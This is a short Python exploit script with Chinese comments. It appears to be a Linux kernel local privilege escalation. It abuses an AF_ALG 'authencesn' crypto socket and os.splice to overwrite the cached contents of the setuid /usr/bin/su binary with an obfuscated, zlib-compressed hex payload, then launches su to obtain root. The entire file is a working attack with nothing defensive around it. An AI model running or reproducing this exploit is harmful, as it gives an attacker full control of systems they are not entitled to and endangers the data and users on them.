1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
|
#!/usr/bin/env python3
import os
import zlib
import socket
# 十六进制转字节工具函数
def d(x):
return bytes.fromhex(x)
# 核心漏洞利用函数
def c(su_fd, t, c):
# 创建套接字:38=AF_ALG, 5=SOCK_SEQPACKET, 0=IPPROTO_IP
a = socket.socket(38, 5, 0)
# 绑定算法:AEAD 认证加密(HMAC-SHA256 + AES-CBC)
a.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
# SOL_ALG = 279,套接字选项常量
SOL_ALG = 279
setsockopt = a.setsockopt
# 设置套接字选项:触发内核漏洞
setsockopt(SOL_ALG, 1, d('0800010000000010' + '0' * 64))
setsockopt(SOL_ALG, 5, None, 4)
# 接受连接并发送构造的消息
u, _ = a.accept()
send_len = t + 4
zero_byte = d('00')
# 构造sendmsg参数,发送恶意数据
u.sendmsg(
[b"A" * 4 + c],
[(SOL_ALG, 3, zero_byte * 4),
(SOL_ALG, 2, b'\x10' + zero_byte * 19),
(SOL_ALG, 4, b'\x08' + zero_byte * 3)],
32768
)
# 管道+splice 零拷贝传输数据
r_fd, w_fd = os.pipe()
os.splice(su_fd, w_fd, send_len, offset_src=0)
os.splice(r_fd, u.fileno(), send_len)
# 接收数据(异常捕获忽略错误)
try:
u.recv(8 + t)
except:
pass
# 主逻辑:提权执行 su 命令
if __name__ == "__main__":
# 打开 /usr/bin/su 文件(只读)
su_fd = os.open("/usr/bin/su", 0)
index = 0
# 解压十六进制编码的恶意载荷
payload = zlib.decompress(
d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
# 循环执行漏洞利用
while index < len(payload):
c(su_fd, index, payload[index:index + 4])
index += 4
# 执行 su 提权
os.system("su")
|
